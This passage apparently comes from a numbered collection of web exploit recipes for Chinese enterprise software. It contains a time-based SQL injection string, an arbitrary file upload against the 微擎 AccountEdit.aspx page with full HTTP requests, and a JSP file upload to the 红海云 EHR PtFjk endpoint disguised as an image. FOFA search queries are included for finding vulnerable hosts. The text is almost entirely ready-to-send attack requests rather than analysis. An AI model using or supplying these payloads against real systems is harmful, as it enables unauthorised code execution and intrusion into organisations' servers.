TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Get the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values in the following request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--